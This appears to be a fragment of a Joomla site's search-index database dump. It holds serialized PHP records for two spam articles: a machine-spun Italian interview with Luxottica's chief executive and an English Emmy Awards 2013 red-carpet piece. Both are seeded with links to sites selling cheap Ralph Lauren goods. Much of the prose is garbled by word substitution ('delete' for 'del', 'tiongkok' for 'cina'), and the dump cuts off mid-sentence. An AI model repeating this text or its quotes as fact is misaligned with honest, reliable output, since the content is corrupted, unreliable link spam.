Lauren Italia\" href=\"http://www.imespec.it\">Ralph Lauren Italia</a></b> luxottica obiettivo 5 miliardi <br /><br />As a result of anni fa erano 4, 3 miliardi, l\' anno scorso quasi 4, 7 i quatst\' anno?Supererà, quest\' anno, luxottica, los angeles barriera dei 5 miliardi di fatturato?Il 65% delete giro d\' affari delete nostro gruppo è in dollari e, quindi, il tasso di cambio influisce molto risponde disadvantage una certa cautela andrea guerra, da tre anni amministratore delegato del gruppo fondato da leonardo del vecchio e chief mondiale dell\' occhialeria.Ma è evidente aggiunge gna stiamo puntando a una nuova, buona, crescita.Disadvantage il traguardo dei 5 miliardi?Ingl\' inizio dell\' anno è difficile immaginare una crescita superiore \'s 10%, ma penso gna un traguardo di questo genere dobbiamo averlo in mente.Low so se li raggiungeremo, mum i 5 miliardi dobbiamo averli in testa.Le linee più exact, comunque, the avremo a marzo.La cosa da sottolineare è che nel 2006 siamo cresciuti delete 13% senza particolari operazioni straordinarie perché, accanto alla capacità già dimostrata di luxottica di do grandi acquisizioni, abbiamo aggiunto anche una capacità di crescita organica, facendo n\'t grande lavoro sull\' organizzazione, sul portafoglio marchi, sulla diversificazione geografica.Il +13% delete 2006 è un risultato deletela macchina operativa.Quali sono, oggi, all of us puntauthored debolmyself dcontent luxottnow ourca?Preferisco parlare di sfide.Penso gna la più importante sia quella di realizzare una struttura organizzativa veramente globale:Avere il meglio degli europei, degli americani, degli asiatici e che sappiano lavorare in tutte le parti delete mondo.Luxottica vuole essere director anche tra dieci vent\' anni, concerning questo dobbiamo curare chi sta in prima linea, integrare le diversità e sapere includere culture ed età various, oltre a somewhat riconosce i valori del gruppo, gna sono semplicità, velocità, umiltà.L\' altra sfida è quella di gestire bene il portafoglio e the opportunità:Ne abbiamo di frequenti, ma non si può service tutto e subito.Mother è sicuramente la primother la sfida più rilevante:È not lavoro lunited nationsgo, as profondità;Dobbas simply put documentamo trovare means gall of usustmy personal mentorsince you, persone che sappiano dare un valore aggiunto non by yourself nel lavoro, cosa gna è più facile, mother anche nell\' organizzazione.I quatsto è davvelectronicro difficilat.Lei sostiene gna le imprese devono essere grandi.Qual è are generally taglia giusta di luxottica?Già oggi abbiamo una dimensione rilevante:Abbiamo una scala in assoluto grande for every il settore e una verticalizzazione importante, e questo ci permette di cost nuove acquisizioni, di accogliere marchi throughout portafoglio, di andare in cina con serenità o di sperimentarsi in of asia, di service un percorso nell\' organizzazione con risorse giovani, di continuare a ticket grandi investimenti.Più volte lei ha detto che la tiongkok è un mercato molto difficile.E da qualche speed c\' è chi, dalla tiongkok, ritorna, anche se for lo più si tratta di aziende medio piccole.La cina è stata dipinta prima originate un incubo,Poi be un paradiso, dobbiamo focus molto attenti con i messaggi.Noi oggi in tiongkok abbiamo complessivamente 2.500 persone ed è una realtà gna è cresciuta in sette otto anni, Abbiamo potuto andarci da soli e air travel esperienza con i fornitori locali, Scam la struttura delle dogane, Disadvantage i permessi, The licenze.Chi è piccolo non ha la possibilità di cost errori.Considerata chicago realtà italiana, gna è fatta di piccole e piccolissime imprese agili e veloci, penso che per loro esista una tiongkok più vitiongkok a cui guardare, paesi travel la romania, chicago polonia, o los angeles turchia.Ha preannunciato prossime acquisizioni with regard to luxottica.Intanto, nei giorni scorsi abbiamo lanciato un\' offerta pubblica per acquistare un ulteriore 20% della nostra controllata ray ban of india, società gna vogliamo espandere.Poi?Abbiamo altre piccole e medie acquisizioni di sale possibili nel breve termine.Su quali mercati?Emergenti e censilidati?Entrambi.Ha detto gna vuole sganciare luxottica dal ciclo economico grazie all\' innovazione dei punti vendita.Gna significa?Parliamo del nord the nation:È il mercato più grande al mondo for <b><a title=\"imespec\" href=\"http://www.imespec.it\">imespec</a></b> each and every gli occhiali ma, per il suo dna legato al easy e allo sport, è stato più lento nello scoprire los angeles moda e il lusso.Oggi nel nord usa quasi l\' 85% degli occhiali da sole hanno un prezzo inferiore ai 30 dollari, ma cinque anni fa questa percentuale get older abbondantemente sopra il 90%.Un mercato gna sta cambiando, e non single per gli occhiali ma per tutta la moda e il lusso.Questo significa gna ci sono ancora grandissimi spazi di crescita prima di pensare gna il mercato sia saturo e si debba seguire la congiuntura.Pertaining to each questo noi dobbiamo avere un portafoglio marchi più robusto e una rete di negozi all\' avanguardia.Già nel biennio passato abbiamo fatto sforzi doing questa direzione e altri ne faremo quest\' anno.Nii nostri nvitamin ygozi sat thelizabethrvizio at thelizabeth qualità rvitamin ysturanno cat thelizabethntrali, mother occorrerà anche della\"Teatralità\"For every attrarre il nostro consumatore.Visto il tipo di negozi che believe facendo, il passo successivo è comprare qualche società delete lusso, oppure avere altri accessori firmati, for every esempio, rayban, il vostro marchio di punta?Assolutamente n\', not abbiamo in mente alcuna diversificazione di questo genere.La cosa positiva di luxottica è stata aver fatto pertaining to each 50 anni il suo mestiere, è la grande lezione di leonardo delete vecchio.Abbiamo tante opportunità nel mondo gna conosciamo, che è bene un distrarsi.Qual è il consuntivo delete primo anno di licenza con dolce gabbana?Erano attesi 120 milioni di fatturato.Andata meglio, sui 130 milioni.Ora stiamo lanciando polo ralph lauren, siamo in fase di lancio scam burberry e da poco abbiamo stretto l\' accordo minus tiffany.Quali marchi sono usciti dal vostro portafoglio?Byblos, moschino u svitamin yrgio tacchini.Possibile pensare al lancio di united nations grande marchio cinese?Nope.Credo di più alla possibilità gna esista un grande marchio brasiliano o indiano.Stento invece a vedere oggi in cina quell\' iniziativa privata che fa scaturire marchi e marketing and providing.<br /><br />Ogni diritto di legge sulle informazioni fornite da rcs attraverso are generally sezione archivi, spetta in using a esclusiva a rcs e sono pertanto vietate la rivendita e la riproduzione, anche parziale, scam qualsiasi modalit e forma, dei dati reperibili attraverso questo servizio.Altrat thelizabethsì vivitamin ytata ogni forma di riutilizzo at thelizabeth riproduzionagouritorito dagouritoritoi marchi at/o di ogni altro satgno distintivo di titolarità di rcs.Chi intendesse utilizzare il servizio deve limitarsi a farlo regarding esigenze of thesonali e/o interne alla propria organizzazione.<br /><br /></p>\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:2:\"84\";s:10:\"created_by\";s:3:\"736\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2015-05-27 05:11:45\";s:11:\"modified_by\";s:3:\"736\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":69:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"0\";s:20:\"link_parent_category\";s:1:\"0\";s:11:\"show_author\";s:1:\"1\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"1\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"0\";s:20:\"show_item_navigation\";s:1:\"0\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"0\";s:14:\"readmore_limit\";s:3:\"100\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"1\";s:9:\"show_hits\";s:1:\"0\";s:11:\"show_noauth\";s:1:\"0\";s:13:\"urls_position\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:25:\"show_urls_images_frontend\";s:1:\"1\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:5:\"right\";s:14:\"float_fulltext\";s:5:\"right\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"4\";s:11:\"num_columns\";s:1:\"2\";s:9:\"num_links\";s:1:\"4\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"1\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"2\";s:23:\"show_pagination_results\";s:1:\"1\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}}s:7:\"version\";s:1:\"3\";s:8:\"ordering\";s:2:\"11\";s:8:\"category\";s:3:\"UAE\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:20:\"128:business-pages-2\";s:7:\"catslug\";s:6:\"84:uae\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:4:\"path\";s:37:\"index.php/84-uae/128-business-pages-2\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:3:\"UAE\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:3:\"UAE\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:5:\"en-GB\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"en-GB\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:48:\"index.php?option=com_content&view=article&id=128\";s:5:\"route\";s:89:\"index.php?option=com_content&view=article&id=128:business-pages-2&catid=84:uae&Itemid=435\";s:5:\"title\";s:4:\"sico\";s:11:\"description\";s:7018:\"Pertaining to each Ralph Lauren Italia luxottica obiettivo 5 miliardi As a result of anni fa erano 4, 3 miliardi, l\' anno scorso quasi 4, 7 i quatst\' anno?Supererà, quest\' anno, luxottica, los angeles barriera dei 5 miliardi di fatturato?Il 65% delete giro d\' affari delete nostro gruppo è in dollari e, quindi, il tasso di cambio influisce molto risponde disadvantage una certa cautela andrea guerra, da tre anni amministratore delegato del gruppo fondato da leonardo del vecchio e chief mondiale dell\' occhialeria.Ma è evidente aggiunge gna stiamo puntando a una nuova, buona, crescita.Disadvantage il traguardo dei 5 miliardi?Ingl\' inizio dell\' anno è difficile immaginare una crescita superiore \'s 10%, ma penso gna un traguardo di questo genere dobbiamo averlo in mente.Low so se li raggiungeremo, mum i 5 miliardi dobbiamo averli in testa.Le linee più exact, comunque, the avremo a marzo.La cosa da sottolineare è che nel 2006 siamo cresciuti delete 13% senza particolari operazioni straordinarie perché, accanto alla capacità già dimostrata di luxottica di do grandi acquisizioni, abbiamo aggiunto anche una capacità di crescita organica, facendo n\'t grande lavoro sull\' organizzazione, sul portafoglio marchi, sulla diversificazione geografica.Il +13% delete 2006 è un risultato deletela macchina operativa.Quali sono, oggi, all of us puntauthored debolmyself dcontent luxottnow ourca?Preferisco parlare di sfide.Penso gna la più importante sia quella di realizzare una struttura organizzativa veramente globale:Avere il meglio degli europei, degli americani, degli asiatici e che sappiano lavorare in tutte le parti delete mondo.Luxottica vuole essere director anche tra dieci vent\' anni, concerning questo dobbiamo curare chi sta in prima linea, integrare le diversità e sapere includere culture ed età various, oltre a somewhat riconosce i valori del gruppo, gna sono semplicità, velocità, umiltà.L\' altra sfida è quella di gestirebene il portafoglio e the opportunità:Ne abbiamo di frequenti, ma non si può service tutto e subito.Mother è sicuramente la primother la sfida più rilevante:È not lavoro lunited nationsgo, as profondità;Dobbas simply put documentamo trovare means gall of usustmy personal mentorsince you, persone che sappiano dare un valore aggiunto non by yourself nel lavoro, cosa gna è più facile, mother anche nell\' organizzazione.I quatsto è davvelectronicro difficilat.Lei sostiene gna le imprese devono essere grandi.Qual è are generally taglia giusta di luxottica?Già oggi abbiamo una dimensione rilevante:Abbiamo una scala in assoluto grande for every il settore e una verticalizzazione importante, e questo ci permette di cost nuove acquisizioni, di accogliere marchi throughout portafoglio, di andare in cina con serenità o di sperimentarsi in of asia, di service un percorso nell\' organizzazione con risorse giovani, di continuare a ticket grandi investimenti.Più volte lei ha detto che la tiongkok è un mercato molto difficile.E da qualche speed c\' è chi, dalla tiongkok, ritorna, anche se for lo più si tratta di aziende medio piccole.La cina è stata dipinta prima originate un incubo,Poi be un paradiso, dobbiamo focus molto attenti con i messaggi.Noi oggi in tiongkok abbiamo complessivamente 2.500 persone ed è una realtà gna è cresciuta in sette otto anni, Abbiamo potuto andarci da soli e air travel esperienza con i fornitori locali, Scam la struttura delle dogane, Disadvantage i permessi, The licenze.Chi è piccolo non ha la possibilità di cost errori.Considerata chicago realtà italiana, gna è fatta di piccole e piccolissime imprese agili e veloci, penso che per loro esista una tiongkok più vitiongkok a cui guardare, paesi travel la romania, chicago polonia, o los angeles turchia.Ha preannunciato prossime acquisizioni with regard to luxottica.Intanto, nei giorni scorsi abbiamo lanciato un\' offerta pubblica per acquistare un ulteriore 20% della nostra controllata ray ban of india, società gna vogliamoespandere.Poi?Abbiamo altre piccole e medie acquisizioni di sale possibili nel breve termine.Su quali mercati?Emergenti e censilidati?Entrambi.Ha detto gna vuole sganciare luxottica dal ciclo economico grazie all\' innovazione dei punti vendita.Gna significa?Parliamo del nord the nation:È il mercato più grande al mondo for imespec each and every gli occhiali ma, per il suo dna legato al easy e allo sport, è stato più lento nello scoprire los angeles moda e il lusso.Oggi nel nord usa quasi l\' 85% degli occhiali da sole hanno un prezzo inferiore ai 30 dollari, ma cinque anni fa questa percentuale get older abbondantemente sopra il 90%.Un mercato gna sta cambiando, e non single per gli occhiali ma per tutta la moda e il lusso.Questo significa gna ci sono ancora grandissimi spazi di crescita prima di pensare gna il mercato sia saturo e si debba seguire la congiuntura.Pertaining to each questo noi dobbiamo avere un portafoglio marchi più robusto e una rete di negozi all\' avanguardia.Già nel biennio passato abbiamo fatto sforzi doing questa direzione e altri ne faremo quest\' anno.Nii nostri nvitamin ygozi sat thelizabethrvizio at thelizabeth qualità rvitamin ysturanno cat thelizabethntrali, mother occorrerà anche della\"Teatralità\"For every attrarre il nostro consumatore.Visto il tipo di negozi che believe facendo, il passo successivo è comprare qualche società delete lusso, oppure avere altri accessori firmati, for every esempio, rayban, il vostro marchio di punta?Assolutamente n\', not abbiamo in mente alcuna diversificazione di questo genere.La cosa positiva di luxottica è stata aver fatto pertaining to each 50 anni il suo mestiere, è la grande lezione di leonardo delete vecchio.Abbiamo tante opportunità nel mondo gna conosciamo, che è bene un distrarsi.Qual è il consuntivo delete primo anno di licenza con dolce gabbana?Erano attesi 120 milioni di fatturato.Andata meglio, sui 130 milioni.Ora stiamo lanciando polo ralph lauren, siamo in fase dilancio scam burberry e da poco abbiamo stretto l\' accordo minus tiffany.Quali marchi sono usciti dal vostro portafoglio?Byblos, moschino u svitamin yrgio tacchini.Possibile pensare al lancio di united nations grande marchio cinese?Nope.Credo di più alla possibilità gna esista un grande marchio brasiliano o indiano.Stento invece a vedere oggi in cina quell\' iniziativa privata che fa scaturire marchi e marketing and providing. Ogni diritto di legge sulle informazioni fornite da rcs attraverso are generally sezione archivi, spetta in using a esclusiva a rcs e sono pertanto vietate la rivendita e la riproduzione, anche parziale, scam qualsiasi modalit e forma, dei dati reperibili attraverso questo servizio.Altrat thelizabethsì vivitamin ytata ogni forma di riutilizzo at thelizabeth riproduzionagouritorito dagouritoritoi marchi at/o di ogni altro satgno distintivo di titolarità di rcs.Chi intendesse utilizzare il servizio deve limitarsi a farlo regarding esigenze of thesonali e/o interne alla propria organizzazione.\";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:5:\"en-GB\";s:18:\"publish_start_date\";s:19:\"2014-03-31 06:04:29\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2014-03-31 06:04:29\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:3;s:15:\"defaultLanguage\";s:5:\"en-GB\";}'),(112,'index.php?option=com_content&view=article&id=130','index.php?option=com_content&view=article&id=130:business-pages-4&catid=84:uae&Itemid=435','daman','2013 Emmy Awards red new gym floor It was an additional red carpet event, the emmy gifts, that produced the life sections Cheap Ralph Lauren UK second most preferred gallery and eighth overall for 2013.Kerry california Who does win a political duel betwee','2015-05-28 22:51:03','74e3867cfc4605363676c6c0e5a48377',1,1,1,'en-GB','2014-03-31 06:04:29','0000-00-00 00:00:00','2014-03-31 06:04:29','0000-00-00 00:00:00',0,0,3,'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:24:{s:2:\"id\";s:3:\"130\";s:5:\"alias\";s:16:\"business-pages-4\";s:7:\"summary\";s:3827:\"<p>2013 Emmy Awards red new gym floor <br /><br />It was an additional red carpet event, the emmy gifts, that produced the life sections <b><a title=\"Cheap Ralph Lauren UK\" href=\"http://www.locosounds.co.uk\">Cheap Ralph Lauren UK</a></b> second most preferred gallery and eighth overall for 2013.Kerry california <br /><br />Who does win a political duel between \'scandal olivia pope and francis underwood, kevin spacey a unique style from \'house of cards\'?Extremely diplomatic, best dramatic actress nominee clad in marchesa and fred leighton jewels didn offer a direct answer but allowed, we got them to share data, i think they be an easy team.It will be global domination.John macmejohn, united states of america todaytina fey, placing on a narciso rodriguez dress, roger vivier heels and clutch and jewellery from fred leighton, picked up an emmy for tremendous writing in a comedy series(\'30 Rock\')And said backstage that she was thankful for great years on nbc. \"It was a labor of affection, and luckily for us our friends at nbc never tried to change the tone of the show, fey supposed.And the appeal for devoted fans? \"I think hardcore comedy fans get excited when they see something which makes them pay attention, means they are work a little harder, and tivo it reverse, john macmeserta, market todaymichael douglas, remaining, luciana barroso and her husband matt damon reach the 2013 emmy awards.Douglas, the \'behind the candelabra\' star and lead actor in a miniseries or movie winner says life after cancer was both loving and fortuitous. \"Two amazing things happened after got cancer.The first was possessing project offered to me on a silver platter.Following about life after cancer, you feel yourself to be a better actor.It\'s a whole lot freer.A core set of fear, john macmeserta, united states of america todaymichael j.Fox returns to tv now, but the actor was taking into account a decision he made years ago:Getting married to actress tracy pollan. \"It\'s fun to be thing about this night and to be here with my wife.We got in the vehicle and i looked at her and thought, surprise, this could be my date, i must do ok, he\'s happy to be on the scene again to nurture other love affairs, because well. \"I enjoy travelling to everybody.May be people i\'ve known for years, this kind of don cheadle and alec baldwin, john macmeserta, usa todayjim parsons the \'big bang theory\' star and lead comedic actor winner has only gratitude for the hit comedy that made him a star and a three time emmy winner. \"This is the most taken aback i\'ve ever felt, he was quoted saying backstage after his win. \"Not that i ever expected anything before but for reasons unknown, this just hit me within a gut.It really amazed me.I was very taken aback by how demonstrative i felt when i got up there.I noticed this year spending budget management nominations came out, i was struck with a sense of gratitude just extra this year, greater numbers of it.I\'m not sure if that\'s because the show is going into its seventh season.I just feel like these things are so fleeting and the concept you get to come back again is really touching, dan macmedan america todaymandy patinkin, on hand, arrives along with father, lester patinkin, at the 2013 emmy accolades.<br /><br />The \'homeland\' star says the set has turned into baby central and he can\'t wait for an arrival of\"Our young child\"Owing to co star morena baccarin. \"Claire danes since(The type of show\'s)First owner had babies.By the upcoming arrival of baby baccarin, the homeland set is in fact a <b><a title=\"locosounds\" href=\"http://www.locosounds.co.uk\">locosounds</a></b> daycare center, according to him. \"I am an experienced person at putting children to sleep.I rocked claire\'s baby to sleep when nobody else could, kevork djansezian, getty photographs.<br /><br /></p>\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:2:\"84\";s:10:\"created_by\";s:3:\"736\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2015-05-29 02:51:01\";s:11:\"modified_by\";s:3:\"736\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":69:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"0\";s:20:\"link_parent_category\";s:1:\"0\";s:11:\"show_author\";s:1:\"1\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"1\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"0\";s:20:\"show_item_navigation\";s:1:\"0\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"0\";s:14:\"readmore_limit\";s:3:\"100\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"1\";s:9:\"show_hits\";s:1:\"0\";s:11:\"show_noauth\";s:1:\"0\";s:13:\"urls_position\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:25:\"show_urls_images_frontend\";s:1:\"1\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:5:\"right\";s:14:\"float_fulltext\";s:5:\"right\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"4\";s:11:\"num_columns\";s:1:\"2\";s:9:\"num_links\";s:1:\"4\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"1\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"2\";s:23:\"show_pagination_results\";s:1:\"1\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}}s:7:\"version\";s:1:\"3\";s:8:\"ordering\";s:1:\"9\";s:8:\"category\";s:3:\"UAE\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:20:\"130:business-pages-4\";s:7:\"catslug\";s:6:\"84:uae\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:4:\"path\";s:37:\"index.php/84-uae/130-business-pages-4\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:3:\"UAE\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:3:\"UAE\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:5:\"en-GB\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"en-GB\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:48:\"index.php?option=com_content&view=article&id=130\";s:5:\"route\";s:89:\"index.php?option=com_content&view=article&id=130:business-pages-4&catid=84:uae&Itemid=435\";s:5:\"title\";s:5:\"daman\";s:11:\"description\";s:3625:\"2013 Emmy Awards red new gym floor It was an additional red carpet event, the emmy gifts, that produced the life sections Cheap Ralph Lauren UK second most preferred gallery and eighth overall for 2013.Kerry california Who does win a political duel between \'scandal olivia pope and francis underwood, kevin spacey a unique style from \'house of cards\'?Extremely diplomatic, best dramatic actress nominee clad in marchesa and fred leighton jewels didn offer a direct answer but allowed, we got them to share data, i think they be an easy team.It will be global domination.John macmejohn, united states of america todaytina fey, placing on a narciso rodriguez dress, roger vivier heels and clutch and jewellery from fred leighton, picked up an emmy for tremendous writing in a comedy series(\'30 Rock\')And said backstage that she was thankful for great years on nbc. \"It was a labor of affection, and luckily for us our friends at nbc never tried to change the tone of the show, fey supposed.And the appeal for devoted fans? \"I think hardcore comedy fans get excited when they see something which makes them pay attention, means they are work a little harder, and tivo it reverse, john macmeserta, market todaymichael douglas, remaining, luciana barroso and her husband matt damon reach the 2013 emmy awards.Douglas, the \'behind the candelabra\' star and lead actor in a miniseries or movie winner says life after cancer was both loving and fortuitous. \"Two amazing things happened after got cancer.The first was possessing project offered to me on a silver platter.Following about life after cancer, you feel yourself to be a better actor.It\'s a whole lot freer.A core set of fear, john macmeserta, united states of america todaymichael j.Fox returns to tv now, but the actor was taking into account a decision he made years ago:Getting married to actress tracy pollan. \"It\'s fun to be thing about this night and to be here with my wife.We gotin the vehicle and i looked at her and thought, surprise, this could be my date, i must do ok, he\'s happy to be on the scene again to nurture other love affairs, because well. \"I enjoy travelling to everybody.May be people i\'ve known for years, this kind of don cheadle and alec baldwin, john macmeserta, usa todayjim parsons the \'big bang theory\' star and lead comedic actor winner has only gratitude for the hit comedy that made him a star and a three time emmy winner. \"This is the most taken aback i\'ve ever felt, he was quoted saying backstage after his win. \"Not that i ever expected anything before but for reasons unknown, this just hit me within a gut.It really amazed me.I was very taken aback by how demonstrative i felt when i 